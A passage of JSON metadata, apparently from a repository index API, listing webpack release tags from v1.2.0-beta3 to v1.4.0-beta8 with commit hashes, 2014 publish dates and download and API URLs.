.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.